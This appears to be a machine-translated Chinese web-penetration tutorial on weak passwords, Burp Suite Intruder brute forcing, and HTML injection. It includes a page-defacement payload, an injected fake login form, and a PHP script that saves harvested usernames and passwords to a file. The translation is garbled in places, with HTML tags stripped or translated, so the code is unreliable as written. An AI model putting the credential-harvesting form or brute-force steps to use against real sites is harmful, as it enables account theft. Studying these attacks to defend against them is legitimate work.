day2-web安全漏洞攻防-基础-弱口令、HTML注入(米斯特web渗透测试)
1. 漏洞2. 弱口令3. Burpsuite (2) 攻击类型
4. HTML注入
1,漏洞
正在挖掘和利用的内容、漏洞(Web 应用程序缺陷)
网站的前后端结构前端是指发生在浏览器中的漏洞,后端是指发生在服务器中的漏洞。
我们如何区分这些前端和后端?例如,HTML注入是前端,而将HTML代码注入页面是前端漏洞。
2,弱口令
弱密码(不是前端也不是后端,和你自己的安全意识有关,你的密码有多弱)
还有第二种弱密码(使用社工,姓名拼音,出生日期)
第一类傻瓜弱密码提供了很多常用弱密码的字典。
第二种方法需要使用在线网络应用工具。如果您了解PHP,请提供该工具的源代码。如果你不懂PHP,我会安装它并教你。该工具称为密码词典。该PHP 文件可以直接放置在phpstudy 网站的根目录中并在本地浏览器中打开,从而在本地运行。
由于找不到PHP文件caimima,所以我找到了一个替代工具,safe6社会工程爆炸密码生成器jar包,并且能够将其上传到我的kali系统并运行它。
弱密码非常多,需要使用工具手动一一输入。因此,弱密码漏洞并不是网站问题。当然,网站也有其问题(不禁止弱密码)。一般登录时都会使用弱密码。如果您需要帐户和密码才能登录,则应首先避免使用它们(稍后我们将解释如何避免使用它们)。 )。
3,爆破
弱密码导致名字爆炸
(1)Burpsuite
Burpsuite使用方便,但需要Java环境
如何在kali中打开并爆破burpsuite 在模块proxy下有一个选项设置,其监听器设置为127.0.0.1。
首先需要进入一个需要暴力破解的登录界面,比如centos7搭建的网站,打开这个登录界面,将火狐浏览器的监听设置设置为本地127.0.0.1.8080端口。准备使用burpsuite抓包。
接下来,将代理下的拦截设置为打开。此时,Burpsuite 处于监听状态。
只需在登录界面输入您的账号和密码,即可显示捕获的包。
这时候你会看到burpsuite抓到的数据包(这个数据包是一个请求消息)并且会显示数据包还没有发送出去。单击“继续”发送。第二次丢包是丢包,之前抓到的包可以在历史记录中看到。丢弃后,如果点击历史记录中的包,会看到只有请求包,没有响应包。这说明没有发送到对应的服务器。
捕获数据包后,单击操作并发送至Intruder。如果你不想捕获数据包,请在httphistory中选择它们,然后右键单击下面的框,将它们发送给入侵者。
为什么要将其发送给Intruder? Intruder 是一个允许您自动发送HTTP 请求的爆破模块。前端JS。
例如,既然数据包已被捕获,则目标对于入侵者的目标来说是可见的。上面的IP就是你要炸毁的IP,端口是80端口。
接下来,进入第二个位置模块。首先通过单击右侧的“清除”来擦除该符号。首先,Blast 会爆破你的账号和密码。然后更改该值只要将该值设置为更改量即可。 before 和after 表示后者被视为变量。然后单击“添加”进行恢复。稍后我们将解释如何设置词典。
(2)攻击类型
描述攻击的类型。定位模块有四种攻击类型。
第一种攻击类型是狙击:第三个模块的payload是字典配置,有payload集合。字典在有效负载选项中配置,并显示一个列表以供粘贴。将生成的txt词典文件全部复制,点击粘贴打开。字典的内容现已包含在内。您还可以通过选择“加载”来导入txt 文件。您还可以自定义字典并通过单击“开始攻击”来启动攻击。以上是第一种攻击方式。第一种攻击是输入自己发送的第0个数据包,从第一个数据包开始改变系统。第一种是更改您输入的帐号并登录,但不更改密码。然后在不更改帐号或密码的情况下进行攻击。
对于第二种攻击类型Battery Ring Ram,再次点击“Start Attack”,不要关闭弹出界面。用户名和密码都是由字典生成的。
第三种类似,有两种有效载荷集可供选择。看起来和第二次攻击是一样的,但是第二次只能设置一个字典,而第三次则可以设置两个字典。两种解码同时发生。
您还可以选择第四种攻击类型,2 个字典。与第三种攻击方式不同的是,两个字典可以交互,互相发送攻击。
一般来说,当存在两个或多个变量时,我们推荐使用交叉攻击方法。例如,如果你想破解一个帐户的密码,名称不确定,密码也不确定,那么你可以使用交叉方法。交叉意味着发送所有组合字典。
在发起攻击攻击后弹出的入侵者攻击界面中,我们可以看到长度为539的用户不存在,531密码错误,538OK爆炸,结果如下:
4,HTML针剂注入
仅当页面能够解析HTML 标记代码时,才将HTML 标记代码插入到页面中才被视为成功。
表格样式=\’left: 0px;top:0px;position:fixed;z-index:5000;position:absolute;width:100%;height:300%;background-color:black;\’
被tbodytrtd 黑客攻击style=\’color:#FFFFFF;z-index: 6000;vertical-align: top;\’h1key/h1/td/tr/tbody
hacked by key
HTML代码已经解析出来了,但是这个漏洞能用来做什么呢?小明能破解这个网站吗?只要是黑底白字的,这就是所谓的黑页。
上图中的代码是HTML代码,但它引用了梅花页面使用的CSS层叠样式表,将网站的所有代码屏蔽在一个黑色的页面中,并写了几句话。把它们变成黑色。什么样的请求会导致这种情况?它是通过URL 的get 方法请求的。您可以在线找到短链接生成器,将长链接变成短链接。这是我自己的享受。除非其他人打开此链接,否则当他们直接访问该网站的链接时,他们不会看到此黑色页面。打开后怎么会造成危害呢?这里的URL是伪造的,是账号和密码登录,而不是名字提交。您可以通过向本网站用户或好友发送如下图所示较长的请求码,信任该用户登录,并输入账户密码来找回用户的登录密码。为什么这个动作有技巧呢?为了修改帖子,我提交了我建立的网站的IP地址,将其传递到我的网页,保存帐户密码,并生成笔记本。以前,当您连接到QQ空间时,您的帐户和密码会存储在数据库中,这与您生成个性化文本时不同。
表格样式=\’left: 0px;top: 0px;position:fixed;z-index: 5000;position:absolute;width:100%;background-color:white;\’
t
塔
表单操作=\’http://127.0.0.1/login.php\’方法=\’post\’
帐号:输入type=\’text\’ name=\’name\’br
密码:输入type=\’password\’ name=\’pwd\’br
输入类型=\’提交\’值=\’登录\’
/形状
/td
/tr
/桌子
帐户:
密码:
?php
header(\’content-type:text/html;charset=utf-8\’);
if (file_put_contents(\’test.txt\’, \’账户:\’.$_POST[\’name\’].\’密码:\’.$_POST[\’pwd\’],FILE_APPEND)) {
echo \’登录成功\’;
}
?
关于前面提到的弱口令,希望大家知道如何修改弱口令,不仅是个人弱口令,还有企业弱口令。管理大公司就更困难了。新员工入职时获得一个公司邮箱地址和默认密码baidu@.123。此时,新员工无需更改密码即可找回账户密码。我希望以后能发生点什么。请不要以未经授权的方式使用它。我们的公司安全规则禁止使用此类密码。
如何修复此HTML 漏洞的答案如下:PHP 最安全的功能。
以上关于#day2的相关内容摘自网络,仅供参考。相关信息请参见官方公告。
原创文章,作者:CSDN,如若转载,请注明出处:https://www.sudun.com/ask/91822.html